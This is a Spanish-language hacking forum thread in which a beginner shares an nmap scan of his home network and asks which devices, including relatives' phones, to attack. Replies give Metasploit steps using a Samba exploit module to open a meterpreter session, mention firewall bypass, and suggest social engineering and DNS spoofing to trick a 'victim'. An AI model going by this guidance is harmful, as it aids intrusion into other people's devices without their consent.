help_outline
Ayudanos!
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Pregunta metasploit

  • 8 Respuestas
  • 576 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado m3tr4l14

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
« en: Diciembre 30, 2018, 06:30:37 pm »
Buenas Grupo, he instalado metasploit pero no se por donde empezar, le pase el nmap y me derivo estos datos:->
Código: [Seleccionar]
nmap -sV 192.168.0.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-30 22:20 CET
Nmap scan report for 192.168.0.1
Host is up (0.0034s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   closed ssh
23/tcp   closed telnet
80/tcp   open   tcpwrapped
1900/tcp open   http       Cisco DPC3828S WiFi cable modem
8080/tcp closed http-proxy
8082/tcp open   http       Mongoose httpd
MAC Address: A4:08:F5:E0:13:8C (Sagemcom Broadband SAS)
Service Info: Device: WAP; CPE: cpe:/h:cisco:dpc3828s

Nmap scan report for 192.168.0.158
Host is up (0.0020s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE   VERSION
443/tcp  open   ssl/http  TiVo To Go httpd 20.6.4.RC40-SAG-11:B55
1503/tcp open   websocket libwebsockets
2191/tcp open   tvbus?
9080/tcp closed glrpc
MAC Address: A0:39:EE:0D:B4:C3 (Unknown)
Service Info: Device: media device

Nmap scan report for 192.168.0.159
Host is up (0.0042s latency).
All 1000 scanned ports on 192.168.0.159 are closed
MAC Address: 80:5A:04:DC:5C:AC (LG Electronics (Mobile Communications))

Nmap scan report for 192.168.0.161
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.0.161 are closed
MAC Address: 84:B5:41:0F:37:CA (Samsung Electronics)

Nmap scan report for 192.168.0.163
Host is up (0.0025s latency).
All 1000 scanned ports on 192.168.0.163 are closed
MAC Address: 50:C8:E5:C7:DB:CD (Samsung Electronics)

Nmap scan report for 192.168.0.167
Host is up (0.0082s latency).
All 1000 scanned ports on 192.168.0.167 are closed
MAC Address: 5C:AF:06:0A:57:EF (LG Electronics (Mobile Communications))

Nmap scan report for 192.168.0.175
Host is up (0.0022s latency).
All 1000 scanned ports on 192.168.0.175 are closed
MAC Address: 7C:F9:0E:F6:5A:E5 (Samsung Electronics)

Nmap scan report for 192.168.0.178
Host is up (0.0052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE     VERSION
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
9000/tcp open  upnp        TwonkyMedia UPnP (UPnP 1.0; pvConnect SDK 1.0; Twonky SDK 1.1)
MAC Address: A4:08:F5:E0:13:8D (Sagemcom Broadband SAS)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2

Nmap scan report for 192.168.0.166
Host is up (0.000073s latency).
All 1000 scanned ports on 192.168.0.166 are closed

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 254 IP addresses (9 hosts up) scanned in 148.37 seconds


Cual objetivo seria interesante atacar?  la mitat son telefonos xD mi madre, brother etc...
Gracias
« Última modificación: Enero 01, 2019, 12:02:10 pm por Gabriela »

Conectado DtxdF

  • *
  • Colaborador
  • *
  • Mensajes: 229
  • Actividad:
    58.33%
  • Reputación 5
  • Fácil manipular + No es fácil manipularse
    • Ver Perfil
    • Transfi: Un sistema de almacenamiento en Herramientas de seguridad informática alojadas en mi repositorio
« Respuesta #1 en: Diciembre 30, 2018, 08:57:42 pm »
192.168.0.1 (el ruter supongo, ofrece servicios interesantes)

192.168.0.178 (si no me equivoco hay un exploit para el servicio samba)
- Gobiernos: Personas desoladas de la inteligencia

Desconectado m3tr4l14

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Diciembre 30, 2018, 09:18:17 pm »
192.168.0.1 (el ruter supongo, ofrece servicios interesantes)

192.168.0.178 (si no me equivoco hay un exploit para el servicio samba)
Gracias por responder,  que se le podria hacer al router?  La ip 178 creo que esta asignada a mi pc kali linux 😄.
Podria sacar pass admin?
Y otra pregunta, que no encuentro,  atacar a teléfonos conectados a red lan, podria?
Porque todo lo que veo en youtube es creando un payload multi handler y mandarselo y esperar a qye pique. ..

Desconectado jonathanvlan

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    10%
  • Reputación 1
    • Ver Perfil
    • Email
« Respuesta #3 en: Diciembre 31, 2018, 04:27:40 pm »
Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - https://subinsb.com/default-device-ttl-values/

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS 192.168.x.xxx
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.x.xxx

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port
Nueva seguridad Aqui / http://unkn0wn.xyz   // El hacking Etico es Basura !

Conectado DtxdF

  • *
  • Colaborador
  • *
  • Mensajes: 229
  • Actividad:
    58.33%
  • Reputación 5
  • Fácil manipular + No es fácil manipularse
    • Ver Perfil
    • Transfi: Un sistema de almacenamiento en Herramientas de seguridad informática alojadas en mi repositorio
« Respuesta #4 en: Diciembre 31, 2018, 09:50:20 pm »
@m3tr4l14

Hola lo que dice @jonathanvlan esta correcto y es una buena ayuda.

Pero te recomiendo que si estás practicando, te recomiendo metasploit, pero si estás llendo más haya (practicando igualmente pero con niveles de dificultad), te recomiendo que usas diferentes programas y/o mucho mejor que crees tú propia carga útil ya que así no sólo practicadas la programación ya que te volverás creativo y tendrás mas ventaja contra sistemas/programas de protección.

Si deseas atacar un dispositivo "remotamente", puedes optar por la ing. social y el dns spoofing. Insitando a que la victima tenga que instalar un plugin o algo por el estilo.

Te recomiendo metasploit así tengas conocimientos amplias para la pre explotación.
- Gobiernos: Personas desoladas de la inteligencia

Desconectado m3tr4l14

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Enero 01, 2019, 01:49:12 am »
Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - https://subinsb.com/default-device-ttl-values/

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS 192.168.x.xxx
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.x.xxx

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port

  waoo  eres un crack 😝😝😝.  Esto serviria para los teléfonos androids conectados?  Ya que pc pocos 😂 el mio y tirando.

Desconectado m3tr4l14

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Enero 01, 2019, 01:50:23 am »
@m3tr4l14

Hola lo que dice @jonathanvlan esta correcto y es una buena ayuda.

Pero te recomiendo que si estás practicando, te recomiendo metasploit, pero si estás llendo más haya (practicando igualmente pero con niveles de dificultad), te recomiendo que usas diferentes programas y/o mucho mejor que crees tú propia carga útil ya que así no sólo practicadas la programación ya que te volverás creativo y tendrás mas ventaja contra sistemas/programas de protección.

Si deseas atacar un dispositivo "remotamente", puedes optar por la ing. social y el dns spoofing. Insitando a que la victima tenga que instalar un plugin o algo por el estilo.

Te recomiendo metasploit así tengas conocimientos amplias para la pre explotación.
jeje gracias por responder, si cuando termine de estudiar vere de ser creativo, q ahora en epoca de exámenes. ...

Desconectado m3tr4l14

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Enero 02, 2019, 03:51:23 pm »
Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - https://subinsb.com/default-device-ttl-values/

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS 192.168.x.xxx
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.x.xxx

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port


Nada no me aclaro  :( ... estoy en la biblioteca  y me lanza demasiados datos 😂... filtered, no tendras algun videotutorial? Te mande un Email pd

Conectado DtxdF

  • *
  • Colaborador
  • *
  • Mensajes: 229
  • Actividad:
    58.33%
  • Reputación 5
  • Fácil manipular + No es fácil manipularse
    • Ver Perfil
    • Transfi: Un sistema de almacenamiento en Herramientas de seguridad informática alojadas en mi repositorio
« Respuesta #8 en: Enero 02, 2019, 08:04:29 pm »
@m3tr4l14

Te recomiendo este vídeo:

- Gobiernos: Personas desoladas de la inteligencia

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 9222
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1775
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2376
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 3391
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 3223
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made